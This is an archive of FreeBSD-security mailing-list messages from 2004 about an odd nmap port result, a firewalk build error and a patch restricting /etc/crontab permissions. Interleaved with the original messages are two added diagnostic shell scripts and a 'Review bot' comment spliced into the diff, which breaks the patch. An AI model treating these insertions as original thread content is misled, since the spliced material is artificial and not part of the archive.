From owner-freebsd-security@FreeBSD.ORG Sun Aug 8 05:36:38 2004
Date: Sun, 8 Aug 2004 07:35:26 +0200
From: Zoran Kolic
To: freebsd-security@freebsd.org
Message-ID: <20040808053526.GA652@kolic.net>
Subject: about nmap

Dear all!
Last evening I noticed that my 5.2 box had a strange result from an nmap search. One port is randomly open when I look from a user account. From root everything looks as expected. The computer is most of the time off the internet. The last thing I did was adding the "expect" package. I am not panicked; it could be hitting... Or something in the "expect" package... It is a random port from 53000 to 57000.
Has someone any idea?
Best regards.

ZK

From owner-freebsd-security@FreeBSD.ORG Sun Aug 8 22:49:55 2004
Date: Sun, 8 Aug 2004 18:49:31 -0400 (EDT)
From: c0ldbyte
To: freebsd-security@freebsd.org
In-Reply-To: <20040808120101.B771D16A4D0@hub.freebsd.org>
References: <20040808120101.B771D16A4D0@hub.freebsd.org>
Subject: Re: freebsd-security Digest, Vol 71, Issue 2
> From: Zoran Kolic
> Subject: about nmap
> [...]
> One port is
> randomly open when I look from
> user account. From root everything
> looks as expected.
> [...]
> It is random
> port from 53000 to 57000.
> Has someone any idea?

Yes, this is going to be one of the ports that nmap uses to relay or receive information back to the client itself. Everything that has anything to do with analyzing the network is going to open a port to receive back on, and most commonly, if you're noticing that port while scanning from a user account, it's just because of the nmap software picking that port up and not ignoring it like it should be.

This e-mail may be privileged and/or confidential, and the sender does not waive any related rights and obligations. Any distribution, use or copying of this e-mail or the information it contains by other than an intended recipient is unauthorized. If you received this e-mail in error, please advise me (by return e-mail or otherwise) immediately.
From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 05:59:41 2004
Date: Mon, 9 Aug 2004 15:59:36 +1000 (EST)
From: Neo-Vortex
To: c0ldbyte
Cc: freebsd-security@freebsd.org
Message-ID: <20040809155909.X88392@Neo-Vortex.Ath.Cx>
References: <20040808120101.B771D16A4D0@hub.freebsd.org>
Subject: Re: freebsd-security Digest, Vol 71, Issue 2

It might also be because you can't do a SYN stealth scan as non-root (which is the default if you are root) and you have to use the normal TCP connect method if you aren't root.
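Both replies above put the port down to the scanner's own sockets rather than to a listener on the box. The way to confirm that is to read the socket table while the scan runs, which is what sockstat(1) prints on FreeBSD. The POSIX sh below is an added example and not code from the thread: it parses sockstat-style output, picks out sockets whose local port falls in the 53000-57000 range the original poster reported, and diffs two snapshots to name the process that appeared. Both snapshots are constructed sample text in sockstat's column layout, not real output; the second one gives an unprivileged nmap connect() scan an outgoing connection whose local port lies in that range.

```shell
#!/bin/sh
# Added example, not code from the thread: triage a port that a scan reports
# open by reading the socket table as sockstat(1) prints it on FreeBSD
# (columns: USER COMMAND PID FD PROTO "LOCAL ADDRESS" "FOREIGN ADDRESS").
# Both snapshots below are constructed sample text, not real output.

# Snapshot taken while the box is idle.
SNAP_IDLE='USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     syslogd    312   4  udp4   *:514                 *:*
root     sendmail   405   4  tcp4   127.0.0.1:25          *:*
nobody   dictd      480   3  tcp4   *:2628                *:*'

# Snapshot taken while an unprivileged connect() scan of localhost is running:
# the scanner's own outgoing connection holds a local port in the range in question.
SNAP_SCAN='USER     COMMAND    PID   FD PROTO  LOCAL ADDRESS         FOREIGN ADDRESS
root     syslogd    312   4  udp4   *:514                 *:*
root     sendmail   405   4  tcp4   127.0.0.1:25          *:*
nobody   dictd      480   3  tcp4   *:2628                *:*
zk       nmap       652   5  tcp4   127.0.0.1:54821       127.0.0.1:443'

# sockets_in_range SNAPSHOT LOW HIGH
# Print "user command pid proto local" for each socket whose local port is
# within [LOW, HIGH]. The port is whatever follows the last ':' of the
# LOCAL ADDRESS column, so IPv6 addresses parse the same way.
sockets_in_range() {
    printf '%s\n' "$1" | awk -v lo="$2" -v hi="$3" '
        NR == 1 { next }                          # header line
        {
            n = split($6, a, ":"); port = a[n] + 0
            if (port >= lo && port <= hi) print $1, $2, $3, $5, $6
        }'
}

# new_sockets BEFORE AFTER
# Lines present in AFTER but not in BEFORE: the "sockstat every minute from
# cron" idea reduced to a diff of two snapshots. Header lines are ignored.
new_sockets() {
    before=$(printf '%s\n' "$1" | awk 'NR > 1')
    printf '%s\n' "$2" | awk 'NR > 1' | grep -Fvx -- "$before"
}

# count_new BEFORE AFTER: how many sockets appeared (prints 0 when none did).
count_new() {
    new_sockets "$1" "$2" | grep -c .
}

echo "Sockets in 53000-57000 during the scan:"
sockets_in_range "$SNAP_SCAN" 53000 57000
echo "Sockets that appeared between the two snapshots:"
new_sockets "$SNAP_IDLE" "$SNAP_SCAN"
```

Run against real snapshots, the two functions answer the question the thread is circling: if the only socket in the range belongs to the scanning user's nmap process, the "open" port is the scan seeing itself; a socket owned by anything else is worth the cron-driven follow-up.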
From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 06:21:19 2004
Date: Mon, 9 Aug 2004 08:18:18 +0200
From: Zoran Kolic
To: larry price
Cc: freebsd-security@freebsd.org
Message-ID: <20040809061818.GA634@kolic.net>
References: <20040808053526.GA652@kolic.net>
Subject: Re: about nmap

Thanks all for the replies.

> Got BIND running? BIND usually likes to have a random TCP port bound. Mine
> seems to be inclined to hang around in the 3xxx range, though.

No, I don't have it.

> nmap itself? Why only in userland? X?

Could be my old and cheap comp. BTW, 3.48.

> what does sockstat -p tell you?

port 25 (ipfw2 dynamic rules)
port 2628 dictd (server for dictionaries)
port 514 syslogd in udp (no rule to access from outside)

> Ftp perhaps?

No, just a workstation. When I find something open and check it again, it is closed. And... I cannot close "syslogd" for report issues. Is it what everyone has open on udp 514? Nothing suspicious in conf.
Best regards.

ZK

From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 07:00:34 2004
Message-ID: <001e01c47dde$7f562420$3501a8c0@pro.sk>
From: "Peter Rosa"
To: "FreeBSD Security"
Cc: Zoran Kolic
Date: Mon, 9 Aug 2004 09:00:04 +0200
References: <20040808053526.GA652@kolic.net> <20040809061818.GA634@kolic.net>
Subject: Re: about nmap

> When I find something open and check
> it again, it is closed. And... cannot
> close "syslogd" for report issues.

At least, can you not run syslogd with syslogd_flags="-ss" in /etc/rc.conf? It disables listening on 514 at all, but syslogd still works locally. Do not use it if your machine is used as a syslogd "file server" for other machines!

And what about some milter? It could open some local connections on high ports. Do you not have some kind of antispam system on your machine? Or DansGuardian or something like that?

Have you tried to run "sockstat >> /some/file" every minute from cron and try to find which process opens the port?
Peter Rosa

From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 19:05:49 2004
From: "Kenzo"
Date: Mon, 9 Aug 2004 14:04:25 -0500
Subject: firewalk

I was wondering if anyone got firewalk to install? I'm running 4.10 stable and it doesn't seem to want to install. It's looking for libnet 1.1 or higher, I believe, and the ports only come with version 1.0. I manually downloaded the latest version and installed it. Still firewalk doesn't know where to look for it. Any ideas??
Thanks.

From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 19:15:58 2004
Date: Mon, 9 Aug 2004 12:33:38 -0600 (CST)
From: Fabio Miranda Hamburger
To: Kenzo
Cc: freebsd-security@freebsd.org
Subject: Re: firewalk

> I was wondering if anyone got firewalk to install?
> I'm running 4.10 stable and it doesn't seem to want to install.
> It's looking for libnet 1.1 or higher I believe and the ports only comes
> with version 1.0.
> I manually downloaded the latest version and installed it. Still firewalk
> doesn't know where to look for it.

#cd /usr/ports/security/firewalk
#make install clean

works fine. If not, try to cvsup the latest -stable ports collection.

From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 20:28:17 2004
From: "Kenzo"
Cc: freebsd-security@freebsd.org
Date: Mon, 9 Aug 2004 15:26:52 -0500
Subject: Re: firewalk

This is what I get.

alien# sudo make install clean
===> Building for firewalk-5.0_1
Making all in src
cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -march=pentiumpro -Wall -c init.c
In file included from /usr/local/include/libnet.h:62,
                 from ../include/firewalk.h:42,
                 from init.c:38:
/usr/include/netinet/ip_icmp.h:81: warning: `icmp_pptr' redefined
/usr/local/include/dnet/icmp.h:131: warning: this is the location of the previous definition
/usr/include/netinet/ip_icmp.h:82: warning: `icmp_gwaddr' redefined
/usr/local/include/dnet/icmp.h:144: warning: this is the location of the previous definition
/usr/include/netinet/ip_icmp.h:185: warning: `ICMP_INFOTYPE' redefined
/usr/local/include/dnet/icmp.h:104: warning: this is the location of the previous definition
In file included from ../include/firewalk.h:42,
                 from init.c:38:
/usr/local/include/libnet.h:87: #error "byte order has not been specified, you'll"
In file included from ../include/firewalk.h:42,
                 from init.c:38:
/usr/local/include/libnet.h:88: syntax error before string constant
*** Error code 1

Stop in /usr/ports/security/firewalk/work/Firewalk/src.
*** Error code 1

Stop in /usr/ports/security/firewalk/work/Firewalk.
*** Error code 1

Stop in /usr/ports/security/firewalk.

I have no idea what this is.
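The pair of messages at libnet.h:87 and :88 is the tell in the log above: a #error whose message continues onto the next line as a bare string, which the preprocessor reports as a syntax error. The POSIX sh below is an added example, not code from the thread, from firewalk or from libnet. It checks a compile line for the byte-order define and works out which one the host needs. The define names LIBNET_LIL_ENDIAN and LIBNET_BIG_ENDIAN and the "libnet-config --defines" script are assumptions taken from libnet 1.1 as I know it; the thread itself does not name them. The compile line is the one quoted in the log, with the console-wrapped "-ma rch=" rejoined.

```shell
#!/bin/sh
# Added example, not code from the thread or from firewalk/libnet. It checks
# for the libnet 1.1 byte-order guard that the build log above trips over.
# Assumed (from libnet 1.1 as I know it, not from the thread): libnet.h
# refuses to compile unless LIBNET_LIL_ENDIAN or LIBNET_BIG_ENDIAN is
# defined, and "libnet-config --defines" prints the -D flags a build needs.

# The compile line from the quoted log, with the console-wrapped "-ma rch="
# rejoined. Neither byte-order define is on it.
LOG_CMD='cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -march=pentiumpro -Wall -c init.c'

# host_byte_order_define
# Print the define this host needs. od(1) decodes the bytes 0x01 0x00 as a
# native unsigned short: 1 on a little-endian host, 256 on a big-endian one.
host_byte_order_define() {
    v=$(printf '\001\000' | od -An -t u2 | tr -d ' \n')
    case "$v" in
        1)   echo '-DLIBNET_LIL_ENDIAN' ;;
        256) echo '-DLIBNET_BIG_ENDIAN' ;;
        *)   echo "unexpected od output: $v" >&2; return 2 ;;
    esac
}

# cflags_have_byte_order "COMPILE LINE"
# Returns 0 when one of the two defines is present, 1 when it is missing,
# which is exactly the state of the quoted build.
cflags_have_byte_order() {
    case " $1 " in
        *' -DLIBNET_LIL_ENDIAN '*|*' -DLIBNET_BIG_ENDIAN '*) return 0 ;;
        *) return 1 ;;
    esac
}

# header_has_guard FILE
# Returns 0 if FILE carries the guard whose #error text the log shows at
# libnet.h:87; use it to tell a libnet 1.1 header from a 1.0 one.
header_has_guard() {
    grep -q 'byte order has not been specified' "$1"
}

# fixed_cflags "COMPILE LINE"
# Echo the line with the host's define appended when it was missing; in a
# port this is what CFLAGS should pick up from "libnet-config --defines".
fixed_cflags() {
    if cflags_have_byte_order "$1"; then
        printf '%s\n' "$1"
    else
        printf '%s %s\n' "$1" "$(host_byte_order_define)"
    fi
}

if cflags_have_byte_order "$LOG_CMD"; then
    echo "byte-order define present; libnet.h:87 will not fire"
else
    echo "no byte-order define; the #error at libnet.h:87 is expected"
    echo "corrected: $(fixed_cflags "$LOG_CMD")"
fi
```

The point of the host probe is that the define is a property of the build host, not of the port: a port that hard-codes one value breaks on the other byte order, which is why libnet ships a script to emit it.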
From owner-freebsd-security@FreeBSD.ORG Mon Aug 9 20:53:38 2004
Message-ID: <4117E44E.1010605@daleco.biz>
Date: Mon, 09 Aug 2004 15:53:34 -0500
From: "Kevin D. Kinsey, DaleCo, S.P."
To: Kenzo
Cc: freebsd-security@freebsd.org
Subject: Re: firewalk

Kenzo wrote:

> This is what I get.
>
> alien# sudo make install clean
> ===> Building for firewalk-5.0_1
> Making all in src
> cc -DHAVE_CONFIG_H -I. -I. -I../include -I/usr/local/include -O -pipe -march=pentiumpro -Wall -c init.c
> [...]
> In file included from ../include/firewalk.h:42,
>                  from init.c:38:
> /usr/local/include/libnet.h:87: #error "byte order has not been specified, you'll"
> In file included from ../include/firewalk.h:42,
>                  from init.c:38:
> /usr/local/include/libnet.h:88: syntax error before string constant
> *** Error code 1
>
> Stop in /usr/ports/security/firewalk/work/Firewalk/src.
> *** Error code 1
>
> Stop in /usr/ports/security/firewalk/work/Firewalk.
> *** Error code 1
>
> Stop in /usr/ports/security/firewalk.
>
> I have no idea what this is.

Looks like someone made a mistake in the libnet port. You can check and see if they've fixed it, either via their website or by checking if a newer version with a different checksum exists at the ftp site. If your ports tree is out of date, it would probably be best to cvsup it anyway...

You might also be able to fix the error yourself --- check lines 87-88 of /usr/local/include/libnet.h. Quite possibly a commented line wrapped wrongly in this case.

HTH,

Kevin Kinsey

From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 16:43:27 2004
Date: Wed, 11 Aug 2004 00:13:05 +0800
From: Xin LI
To: freebsd-security@FreeBSD.org
Message-ID: <20040810161305.GA161@frontfree.net>
Subject: [PATCH] Tighten /etc/crontab permissions

Hi folks,

While investigating OpenBSD's cron implementation, I found that they set the systemwide crontab (a.k.a. /etc/crontab) to be readable by the superuser only. The attached patch will bring this to FreeBSD by moving crontab out of the BIN1 group and installing it along with master.passwd. This change should not affect the current cron(1) behavior.

Cheers,
-- 
Xin LI http://www.delphij.net/
See complete headers for GPG key and other information.
[Attachment: patch-etc-Makefile]

Index: Makefile
===================================================================
RCS file: /home/fcvs/src/etc/Makefile,v
retrieving revision 1.327
diff -u -r1.327 Makefile
--- Makefile	23 Mar 2004 22:17:34 -0000	1.327
+++ Makefile	10 Aug 2004 06:03:59 -0000
@@ -6,7 +6,7 @@
 .endif
 
 BIN1=	amd.map apmd.conf auth.conf \
-	crontab csh.cshrc csh.login csh.logout devd.conf devfs.conf \
+	csh.cshrc csh.login csh.logout devd.conf devfs.conf \
 	dhclient.conf disktab fbtab ftpusers gettytab group \
 	hosts hosts.allow hosts.equiv hosts.lpd \
 	inetd.conf login.access login.conf \
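Review bot: with crontab dropped from BIN1 in this hunk, nothing installs /etc/crontab at all unless the `-m 600` install line in the next hunk lands with it, so the two hunks must be committed together and the commit message should say so. The Makefile change also only takes effect on a fresh install or `make distribution`: an existing /etc/crontab keeps whatever mode it already has until it is reinstalled, which is worth a line in the commit message so administrators know to fix up installed systems by hand.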
@@ -73,7 +73,7 @@
 		${INSTALL} -o ${BINOWN} -g ${BINGRP} -m 755 \
 		    ${BIN2} ${DESTDIR}/etc; \
 		${INSTALL} -o ${BINOWN} -g ${BINGRP} -m 600 \
-		    master.passwd nsmb.conf opieaccess ${DESTDIR}/etc; \
+		    crontab master.passwd nsmb.conf opieaccess ${DESTDIR}/etc; \
 		pwd_mkdb -p -d ${DESTDIR}/etc ${DESTDIR}/etc/master.passwd
 		cd ${.CURDIR}/bluetooth; ${MAKE} install
 		cd ${.CURDIR}/defaults; ${MAKE} install

From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 17:02:11 2004
Date: Tue, 10 Aug 2004 10:02:09 -0700 (PDT)
From: Doug Barton
To: Xin LI
Cc: "freebsd-security@FreeBSD.org"
In-Reply-To: <20040810161305.GA161@frontfree.net>
Message-ID: <20040810095953.H1984@qbhto.arg>
References: <20040810161305.GA161@frontfree.net>
Organization: http://www.FreeBSD.org/
Subject: Re: [PATCH] Tighten /etc/crontab permissions

On Wed, 11 Aug 2004, Xin LI wrote:

> Hi folks,
>
> While investigating OpenBSD's cron implementation, I found that they set
> the systemwide crontab (a.k.a. /etc/crontab) to be readable by the
> superuser only. The attached patch will bring this to FreeBSD by moving
> crontab out from BIN1 group and install it along with master.passwd.

Do you have a reason for wanting to do this other than, "OpenBSD does it this way?" I personally see no problems, and some benefit for users being able to see the system crontab. If the superuser needs to run "secret" cron jobs, then there is root's crontab that can be used for this purpose.

Can you elaborate on your thinking?
Doug

-- 
This .signature sanitized for your protection

From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 18:10:49 2004
Date: Wed, 11 Aug 2004 02:10:39 +0800
From: Xin LI
To: Doug Barton
Cc: "freebsd-security@FreeBSD.org"
Message-ID: <20040810181039.GA3189@frontfree.net>
References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg>
In-Reply-To: <20040810095953.H1984@qbhto.arg>
Subject: Re: [PATCH] Tighten /etc/crontab permissions

Hi, Doug

On Tue, Aug 10, 2004 at 10:02:09AM -0700, Doug Barton wrote:
> On Wed, 11 Aug 2004, Xin LI wrote:
> [...]
> Do you have a reason for wanting to do this other than, "OpenBSD does it
> this way?" I personally see no problems, and some benefit for users
> being able to see the system crontab.
If the superuser needs to run > "secret" cron jobs, then there is root's crontab that can be used for > this purpose. > > Can you elaborate on your thinking? Well... This seems much more than "OpenBSD does it" to me :-) On a system where all users play nice, it does not matter if other users can see the crontab. However, if it gets compromised, chances are that a badly configured system, say, with some permissions badly granted, would give the intruder a better chance to get more privilege if [s]he can read the crontab, and I think this is one of the reasons why the per-user crontabs are kept in /var/cron without granting users permission to see each others'. I'm not sure if this is a sort of abuse of systemwide crontabs, but the administrators at my company have used them to run some tasks periodically under other identities (to limit these tasks' privilege), and it provided a somewhat "centralized" management so they would prefer to use the systemwide crontab rather than per-user ones. What do you think about the benefit for users being able to see the system crontab? I think knowing what would be executed under others' identity is (at least) not always a good thing, especially for the users we generally don't fully trust... Cheers, -- Xin LI http://www.delphij.net/ See complete headers for GPG key and other information.
From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 19:01:33 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id D400616A4CE; Tue, 10 Aug 2004 19:01:33 +0000 (GMT) Received: from smtp3.server.rpi.edu (smtp3.server.rpi.edu [128.113.2.3]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2398943D39; Tue, 10 Aug 2004 19:01:33 +0000 (GMT) (envelope-from drosih@rpi.edu) Received: from [128.113.24.47] (gilead.netel.rpi.edu [128.113.24.47]) by smtp3.server.rpi.edu (8.13.0/8.13.0) with ESMTP id i7AJ1Vmo025789; Tue, 10 Aug 2004 15:01:32 -0400 Mime-Version: 1.0 X-Sender: drosih@mail.rpi.edu Message-Id: In-Reply-To: <20040810181039.GA3189@frontfree.net> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040810181039.GA3189@frontfree.net> Date: Tue, 10 Aug 2004 15:01:30 -0400 To: Xin LI , Doug Barton
From: Garance A Drosihn Content-Type: text/plain; charset="us-ascii" ; format="flowed" X-Scanned-By: CanIt (www . canit . ca) cc: freebsd-security@freebsd.org Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 19:01:34 -0000 At 2:10 AM +0800 8/11/04, Xin LI wrote: > >On Tue, Aug 10, 2004 at 10:02:09AM -0700, Doug Barton wrote: >> > > Can you elaborate on your thinking? > >I'm not sure if this is a sort of abusing systemwide crontabs, but >the administrators at my company have used them to run some tasks >periodically under other identities (to limit these tasks' privilege), >and it provided a somewhat "centralized" management so they would >prefer to use systemwide crontab rather than per-user ones. You could get about the same effect by having them all under root's crontab, and then having the entry 'su' to the appropriate userid before running. So it is centralized in one crontab (root's), but it is protected from prying eyes. >What do you think about the benefit for users being able to see >the system crontab? I think knowing what would be executed under >others' identity is (at least) not always a good thing, especially >the users we generally don't fully trust... For generic system tasks, it can be useful to know when they run. Maybe this means more to me because I'm actually awake at all odd hours of the morning, so I notice the effects of some of those runs. My runs of 'cvsup_mirror', for instance. Basically, I use the system crontab for events where I think it is safe for every user to know when the events occur, and use other crontabs for the things I want to keep private. Just a personal preference thing, obviously.
-- Garance Alistair Drosehn = gad@gilead.netel.rpi.edu Senior Systems Programmer or gad@freebsd.org Rensselaer Polytechnic Institute or drosih@rpi.edu From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 19:40:28 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4031D16A4CE; Tue, 10 Aug 2004 19:40:28 +0000 (GMT) Received: from pd3mo2so.prod.shaw.ca (shawidc-mo1.cg.shawcable.net [24.71.223.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id B9F4843D2D; Tue, 10 Aug 2004 19:40:27 +0000 (GMT) (envelope-from gbaratto@superb.net) Received: from pd4mr2so.prod.shaw.ca (pd4mr2so-qfe3.prod.shaw.ca [10.0.141.213]) by l-daemon (iPlanet Messaging Server 5.2 HotFix 1.18 (built Jul 28 2003)) with ESMTP id <0I2800JGQWZDTI@l-daemon>; Tue, 10 Aug 2004 13:33:13 -0600 (MDT) Received: from pn2ml6so.prod.shaw.ca ([10.0.121.150]) by pd4mr2so.prod.shaw.ca (Sun ONE Messaging Server 6.0 HotFix 1.01 (built Mar 15 2004)) with ESMTP id <0I28009DUWZCPY50@pd4mr2so.prod.shaw.ca>; Tue, 10 Aug 2004 13:33:12 -0600 (MDT) Received: from chivas (S01060080c8118809.vc.shawcable.net [24.85.89.252]) by l-daemon (iPlanet Messaging Server 5.2 HotFix 1.18 (built Jul 28 2003)) with SMTP id <0I2800D5FWZBED@l-daemon>; Tue, 10 Aug 2004 13:33:12 -0600 (MDT) Date: Tue, 10 Aug 2004 12:32:56 -0700 
From: "Gustavo A. Baratto" To: Xin LI , Doug Barton , Garance A Drosihn Message-id: <002401c47f10$d6f98ea0$6400a8c0@chivas> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441 X-Mailer: Microsoft Outlook Express 6.00.2800.1437 Content-type: text/plain; charset=iso-8859-1 Content-transfer-encoding: 7bit X-Priority: 3 X-MSMail-priority: Normal References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040810181039.GA3189@frontfree.net> cc: freebsd-security@freebsd.org Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 19:40:28 -0000 It is better to have something secure by default. If someone wants to open up the crontab in /etc/crontab for other users to see it, he/she can do it at his/her own risk. Many people who are not very familiar with system administration or security, but yet manage a server, could add cronjobs that could be very harmful to themselves without knowing it (e.g. mysqldump for backups with the password hardcoded in the command). Maybe the purpose of /etc/crontab is exactly to be a read-by-all file. That's fine, but in this case, a security warning in BIG letters should be printed at the very beginning of the file. my $0.02 ;)
From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 20:17:16 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id A7B3716A4CE for ; Tue, 10 Aug 2004 20:17:16 +0000 (GMT) Received: from dfmm.org (walter.dfmm.org [66.180.195.210]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8DE7B43D3F for ; Tue, 10 Aug 2004 20:17:16 +0000 (GMT) (envelope-from freebsd-security@dfmm.org) Received: (qmail 55608 invoked by uid 1000); 10 Aug 2004 20:17:16 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 10 Aug 2004 20:17:16 -0000 Date: Tue, 10 Aug 2004 13:17:14 -0700 (PDT)
From: Jason Stone X-X-Sender: jason@walter To: "freebsd-security@FreeBSD.org" In-Reply-To: <20040810181039.GA3189@frontfree.net> Message-ID: <20040810130428.L19702@walter> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <20040810181039.GA3189@frontfree.net> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 20:17:16 -0000 > What do you think about the benefit for users being able to see the > system crontab? I think knowing what would be executed under others' > identity is (at least) not always a good thing, especially the users we > generally don't fully trust... so do you also suggest that we default to setting the sysctl variables that prevent users from seeing each others' processes with ps(1)? because to me, if you want to be hard core, that seems like a much more obvious place to start - who cares that I can read crontab if I can run ps and see _all_ the other processes on the system, not just the ones in cron. the default install has to strike the right balance of security out of the box and usability out of the box, and it's sometimes unclear what the right choices are. but even if you want to err on the side of security, you still have to think about things logically, and think of what exactly you're protecting and from whom. if users shouldn't be able to see each others' processes, then you should address that from a more systemic level and not just try to tack on little security annoyances.
if you want to say that users shouldn't be able to see each other, then think about all the ways that users can see each other - reading each others' files, seeing each others' processes with ps or in /proc, seeing what network ports other users have bound with sockstat or lsof - then decide which are the important things to lock down, which ones are easy and which ones are not worth it, and come up with a more comprehensive approach. I wouldn't object to a general, high-level security option to prevent users from seeing each other, but only changing the permissions on crontab doesn't buy you any real security, it just creates annoyances. -Jason -------------------------------------------------------------------------- Freud himself was a bit of a cold fish, and one cannot avoid the suspicion that he was insufficiently fondled when he was an infant. -- Ashley Montagu From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 20:21:09 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 7E95C16A4CE; Tue, 10 Aug 2004 20:21:09 +0000 (GMT) Received: from a2.scoop.co.nz (aurora.scoop.co.nz [203.96.152.68]) by mx1.FreeBSD.org (Postfix) with ESMTP id 8E54443D2D; Tue, 10 Aug 2004 20:21:08 +0000 (GMT) (envelope-from andrew@scoop.co.nz) Received: from localhost (localhost [127.0.0.1]) by a2.scoop.co.nz (8.12.11/8.12.11) with ESMTP id i7AKL7ZT087189; Wed, 11 Aug 2004 08:21:07 +1200 (NZST) (envelope-from andrew@scoop.co.nz) Date: Wed, 11 Aug 2004 08:21:07 +1200 (NZST)
From: Andrew McNaughton To: "Gustavo A. Baratto" In-Reply-To: <002401c47f10$d6f98ea0$6400a8c0@chivas> Message-ID: <20040811080257.Q1573@a2.scoop.co.nz> References: <20040810161305.GA161@frontfree.net> <20040810095953.H1984@qbhto.arg> <002401c47f10$d6f98ea0$6400a8c0@chivas> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed X-Greylist: Sender IP whitelisted, not delayed by milter-greylist-1.5.3 (a2.scoop.co.nz [127.0.0.1]); Wed, 11 Aug 2004 08:21:07 +1200 (NZST) X-Virus-Scanned: clamd / ClamAV version 0.74, clamav-milter version 0.74a on a2.scoop.co.nz X-Virus-Status: Clean cc: freebsd-security@freebsd.org cc: Garance A Drosihn Subject: Re: [PATCH] Tighten /etc/crontab permissions X-BeenThere: freebsd-security@freebsd.org X-Mailman-Version: 2.1.1 Precedence: list List-Id: Security issues [members-only posting] List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 10 Aug 2004 20:21:09 -0000 Hiding the contents of /etc/crontab sounds to me like security through obscurity. There's very little depth to it, and it's more likely to give a false sense of security than anything real. Anyone hardcoding a mysql password in the command line is asking for trouble, regardless of whether /etc/crontab is readable. Once running, it's visible to anyone via tools like ps and procfs. Better to leave the neophyte administrator to figure out how not to put the password or anything else sensitive on the command line, rather than letting them believe that it's secure because the crontab file is not readable. Andrew McNaughton On Tue, 10 Aug 2004, Gustavo A. Baratto wrote: > It is better to have something secure by default. If someone wants to open > up the crontab in /etc/crontab for other users to see it, he/she can do it > on his/her own risk.
-- No added Sugar. Not tested on animals. May contain traces of Nuts. If irritation occurs, discontinue use. ------------------------------------------------------------------- Andrew McNaughton Living in a shack in Tasmania andrew@scoop.co.nz Between the bush and the sea Mobile: +61 422 753 792 http://staff.scoop.co.nz/andrew/cv.doc http://www.scoop.co.nz/ From owner-freebsd-security@FreeBSD.ORG Tue Aug 10 20:34:04 2004 Return-Path: Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.freebsd.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 672EC16A4CE for ; Tue, 10 Aug 2004 20:34:04 +0000 (GMT) Received: from mxsf06.cluster1.charter.net (mxsf06.cluster1.charter.net [209.225.28.206]) by mx1.FreeBSD.org (Postfix) with ESMTP id EC81543D49 for ; Tue, 10 Aug 2004 20:34:03 +0000 (GMT) (envelope-from c0ldbyte@myrealbox.com) Received: from mxip20.cluster1.charter.net (mxip20a.cluster1.charter.net [209.225.28.150])i7AKY2oU014026 for ; Tue, 10 Aug 2004 16:34:02 -0400 Received: from 24.247.14.41.gha.mi.chartermi.net (HELO eleanor.spectical.net) (24.247.14.41) by mxip20.cluster1.charter.net with ESMTP; 10 Aug 2004 16:34:03 -0400 X-Ironport-AV: i="3.83,118,1089000000"; d="scan'208"; a="118975014:sNHT14816328" Date: Tue, 10 Aug 2004 16:34:02 -0400 (EDT)
